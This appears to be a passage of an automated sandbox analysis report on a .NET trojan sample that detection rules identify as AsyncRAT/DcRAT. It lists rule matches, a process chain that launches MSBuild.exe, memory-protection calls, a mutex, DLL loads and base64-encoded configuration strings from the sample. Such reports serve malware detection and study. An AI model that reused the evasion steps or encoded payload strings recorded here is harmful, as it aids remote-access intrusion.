          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 00000004.00000002.2388462794.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: 00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: Process Memory Space: MSBuild.exe PID: 5036, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          .NET source code contains very large strings
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, -Module-.csLong String: Length: 12165
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01233ED8 NtProtectVirtualMemory,4_2_01233ED8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01233A80 NtProtectVirtualMemory,4_2_01233A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012391584_2_01239158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012333084_2_01233308
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012396584_2_01239658
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012388884_2_01238888
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012332F74_2_012332F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_012385404_2_01238540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01233A804_2_01233A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0123CA904_2_0123CA90
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: invalid certificate
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1175941432.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000000.1138324873.0000000000D8E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe. vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe, vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1177191049.0000000005700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename5dljncsi.dll4 vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.000000000326D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe, vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5dljncsi.dll4 vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeBinary or memory string: OriginalFilenameStub.exe. vs SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
          Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
          Source: 00000004.00000002.2388462794.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: Process Memory Space: MSBuild.exe PID: 5036, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, Settings.csBase64 encoded string: 'mCjC1mXFXZy8ioCjbn6w8CRTyqr/xm5hi9zK+NDRUOqE4m3xYvKfU5Peq4LACN/llFaMspJwsqeFMiRbG7QyuA==', 'PUn+GkTlaHSLjrKYb+Bp0dG60k3Tf5GZSbkUwtBfuOwSvfCAUkcp4Oc50HzcOS+2hAWsmDUZ6A49B/jks0kaQg==', 'yeptw6952mPzduhOgtWo0mwhgEhqGnbrASu8GzG4UF7BSqLGGI3+QTOP0LQk9W/OgnFFF2oAeai3tGwX3gjndw==', 'PSZ0LHwEG1Hb+2NbqQujB+iznAisxarF7nbUMGsPInWSYqWhvqbuTmEccpb0b0AlRuPzuMf7WSmbn8r8FbTJy5PD2X2pZZwkiSv4x8WiFik7GrWAYZZ3NAoRLn1/JdnXjGL9qsWdHBC+aG2bEeqa5NPDrYQIZwRjkkvElN0OXNvAkYom9QXTqf0KacRjk7cRwrrEX6v0d/cy1evDFcXpH9R9dvc8JQIfWxcqH/eUDbZ4pyHhKfs7si0s8+ce+5UBRbsWQFR/hQ09HcYlkkQk42HShK41V09cqpC3vvjb1zSrqQeHcrlWc2nDIpEweeajU0iq9VTzINnQaHIsD+A57vy0xcw5bkZTS9Z1H93q+qW6UyAaqn/clKfaW2KyJYp9tcoRgx1a3oYAyUJ3kjynScMfouULNKvz7YEeB9+Qm0CK7zN6yk0ObpiBljSeLy/lLzqPIHTEGiIVsqWwDbR3s1Zhg0pF19fmPntdj4665QgS4UL9aDU7Tbo80DfcfPF0LfQmvi5lxA1QnH0SdsNnX7cwGCV+g5dOFG2iBuwqUNhVM8s9bleBWVhAfPiwFERIQdNIJ0uf4P1bbaH1EVnS81EzyXu1U47X8u+83kreHxOgTusWxNCDfN00+tzPOWAuVsXEt7/bPKPYsWF3VVOZAjXisavjkWbRUS8yhY+zMX86tLAAYXVv8JUVhEeqZ2XRuO+W5d+rDTu+JGDssZgZZZQqM7iH42bwZZ4aY12NnRbMRdPw0nbrTdk9bTm0+wetlUHxPfxNLroTntF2FifRtAaXumpGeaT4f69nhQc4uVud9Dt5I4RM5i8uwO3Mm91aYZPLcIq7/rgwNwIzvu3WdTAQg5qeaysYk1lnNLIZ6So33aIIdswtkkcGVGgHHZK7Gr8EjSIknT8Rww28IAzEWGTiTIN6EQ939cx9OfcFQxh+MuvkaH3e+S3dO2oLn9X5yq6xmvCgSOGviHlFphOP/ZC0US9u1eSNiSn8e5jaJzMkB8Ql2tZKDH5pDK/G8qtugYiuYsdSduTxTfM821lWfMZdTUlararLtW/QUICoIUelDh43Cyp+dWloLlCT4poG', 'x77LgmTr3oNtRC+EBHxfeeBAkCmCCYtyepMobBGfJeq0tBhOfqlaD75XvZGNvUXUAzH2crMSu9sD0B7Z1QfmsUYq2G7X+ci1fE6xIeGcTGpLl2srGNN7gZgdiCOnnv4BV+UhVCFe9PQnCCxXsV6y0jOTgQN0H0ynpNrFddjc5Hm2yGYQLa+zEe4uMs2kwI7P9L27q/DwZi2Q+6ytjsJpOAlbU2nNHDUetLmU2s8ei5202dZMaaFtE8TLEuURLPN0NOOYC7NYCsYcBOrUUdoMC3Qa2IHy2Sj+/6vsmL8fST8=', 'IM0CMg420YzeigUcsg8rcxoih1oupgQXHNvEwlN+34BFP6/HvJ1FAvdDSqd+hjuNp7yGpAkDgYBCBbS2TX+oHw==', 'vIirHVJobjs5JInfBr6OF/GOSfapO92o2wxQjXOGuaYDLPxUomeC0Tm/0Q+ORcfK2vJ9qnI3zllKsWvij2Hsbg==', 'yeNaph23QqEvnB729bvMI6tcgbPReIE6FmdXMOLPi1tl9nDODtkXRujKo6XY++801pr76Bipx/9c7OHBn6pUJg==', 'zsy2s79YozzLqkFPcU1UUlT8wY3UI2lKzyE1ACBETF/B5UgPPtVR/gSVlm6eZEAcPqWyRDOxU0+XszAKZiqkfg=='
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/9@1/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.logJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2576:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\sypjebdnczk
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeFile created: C:\Users\user\AppData\Local\Temp\5dljncsiJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeVirustotal: Detection: 31%
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8956.tmp" "c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8956.tmp" "c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
